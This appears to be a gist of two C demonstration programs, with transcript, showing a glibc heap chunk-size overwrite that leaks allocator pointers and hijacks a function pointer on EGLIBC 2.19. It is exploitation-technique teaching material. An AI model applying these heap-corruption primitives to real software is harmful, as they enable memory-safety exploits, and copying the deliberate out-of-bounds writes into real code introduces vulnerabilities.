CVE-2015-0235 heap chunk size overwrite / http://www.openwall.com/lists/oss-security/2015/01/27/9
#include <unistd.h> | |
#include <stdlib.h> | |
#include <string.h> | |
/*
 * Deliberate heap-overflow demonstration (the gist title calls it a heap
 * chunk size overwrite).  Every step depends on the exact heap layout that
 * this particular sequence of malloc/free calls produces, so the statements
 * must not be reordered.  The program invokes undefined behaviour on
 * purpose: the writes at the "overwrite" step go past the end of the
 * 0x100-byte block p1.
 *
 * Returns 0 after dumping the raw contents of p3 to stdout.  The malloc()
 * and write() return values are not checked, which is tolerable only for a
 * throwaway demo.
 */
int main()
{
    /* preparation */
    /* Three 0x100-byte allocations.  NOTE(review): the demo assumes the
       allocator places them next to each other; nothing in the C standard
       guarantees that. */
    char *p1 = malloc(0x100);
    char *p2 = malloc(0x100);
    char *p3 = malloc(0x100);
    memset(p3, 'A', 0x100);   /* known marker: any non-'A' byte in p3 later is data that leaked in from elsewhere */
    free(p2);                 /* leaves a freed chunk between p1 and p3 */
    /* overwrite the size of next chunk */
    /* OUT-OF-BOUNDS WRITE: 0x108 bytes into a block that was requested as
       0x100.  The final 8 bytes land past the end of p1.  A bounds check on
       the length here, or running under AddressSanitizer, should stop the
       demo at this line. */
    memset(p1, 'B', 0x108);
    /* Second out-of-bounds write, at offsets 0x108..0x110 past p1.  The
       eight bytes are the value 0x1001 in little-endian order; per the
       author's comment above this replaces the freed chunk's size field. */
    memcpy(p1+0x108, "\x01\x10\x00\x00\x00\x00\x00\x00", 8);
    /* read(0, p1, 0x110); */
    /* The commented-out read() above is the author's stand-in for untrusted
       input: an over-long read from stdin in place of the hard-coded
       memset/memcpy.  It is the point where a length check would belong. */
    /* split freed chunk */
    /* p4 is never read; presumably the call matters only for the effect the
       corrupted size field has on what the allocator hands back. */
    char *p4 = malloc(0x100);
    /* read out buffer next to freed chunk */
    /* Dumps p3 raw.  In the transcript on this gist the first 32 bytes of
       p3 are no longer 'A' (pointer-looking values followed by zeros): an
       information leak of allocator bookkeeping data into user-visible
       memory.  The transcript was produced on EGLIBC 2.19 (see the libc
       banner below); later allocator versions add consistency checks on
       chunk size fields and may abort instead — confirm before relying on
       either outcome. */
    write(1, p3, 0x100);
    return 0;
}
#include <unistd.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
/* Target routine for the demo.  It prints "exiting..." followed by a newline
 * so that a call reaching it through an intact function pointer is visible
 * on stdout; the transcript below never gets this far. */
void f()
{
    fputs("exiting...", stdout);
    fputc('\n', stdout);
}
/*
 * Deliberate heap-overflow demonstration, second variant: the same chunk
 * size overwrite as in infoleak.c, followed by a larger allocation whose
 * fill pattern ends up in the chunk that holds a function pointer.
 * Statement order is load-bearing (it determines the heap layout); do not
 * reorder.  Undefined behaviour is invoked on purpose.
 *
 * Expected outcome, taken from the transcript in this gist: the first
 * printf shows the address of f, the second shows 0x4242424242424242
 * ('B' repeated), and the indirect call then faults.  malloc() results are
 * not checked.
 */
int main()
{
    /* preparation */
    char *p1 = malloc(0x100);
    char *p2 = malloc(0x100);
    void (**p3)() = malloc(8);   /* 8-byte block holding a single function pointer */
    *p3 = f;
    free(p2);                    /* leaves a freed chunk between p1 and the p3 block */
    /* Baseline: *p3 still points at f.  NOTE(review): passing a function
       pointer to %p is not strictly portable; fine for a Linux/x86_64 demo. */
    printf("[+] *p3 = %p\n", *p3);
    /* overwrite the size of next chunk */
    /* OUT-OF-BOUNDS WRITE: 0x108 bytes into a block requested as 0x100.
       A length check here, or AddressSanitizer, should stop the demo. */
    memset(p1, 'A', 0x108);
    /* Out-of-bounds write at p1+0x108: the value 0x1001 little-endian, which
       the author's comment identifies as the freed chunk's size field. */
    memcpy(p1+0x108, "\x01\x10\x00\x00\x00\x00\x00\x00", 8);
    /* read(0, p1, 0x110); */
    /* allocate chunk for overwriting */
    char *p4 = malloc(0x200);    /* larger than the earlier 0x100 requests */
    /* overwrite following chunks */
    /* This memset stays within the 0x200 bytes p4 was requested as, yet the
       transcript shows *p3 becoming 'B' bytes afterwards — i.e. the block
       the allocator returned for p4 overlaps the chunk holding *p3.  The
       corruption happened at the size-field write above; this line only
       makes it visible. */
    memset(p4, 'B', 0x200);
    /* read(0, p4, 0x200); */
    /* The two commented-out read() calls mark where untrusted input would
       enter in place of the hard-coded writes. */
    /* trigger */
    printf("[+] *p3 = %p\n", *p3);   /* transcript: 0x4242424242424242 */
    /* Indirect call through the clobbered pointer: a control-flow hijack
       primitive.  In the transcript it segfaults because 0x4242... is not
       mapped; control-flow integrity or a bounds check upstream would
       prevent reaching this state. */
    (*p3)();
    return 0;
}
$ gcc infoleak.c
$ ./a.out | xxd
0000000: b877 c15d 137f 0000 b877 c15d 137f 0000 .w.].....w.]....
0000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0000030: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0000040: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0000050: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0000060: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0000070: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0000080: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0000090: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000a0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000b0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000c0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000d0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000e0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000f0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
$ gcc ptr_overwrite.c
$ ./a.out
[+] *p3 = 0x4006bd
[+] *p3 = 0x4242424242424242
Segmentation fault (core dumped)
$ uname -a
Linux vm-ubuntu64 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu EGLIBC 2.19-0ubuntu6.9) stable release version 2.19, by Roland McGrath et al.
Copyright (C) 2014 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 4.8.4.
Compiled on a Linux 3.13.11 system on 2016-05-26.
Available extensions:
crypt add-on version 2.1 by Michael Glad and others
GNU Libidn by Simon Josefsson
Native POSIX Threads Library by Ulrich Drepper et al
BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/eglibc/+bugs>.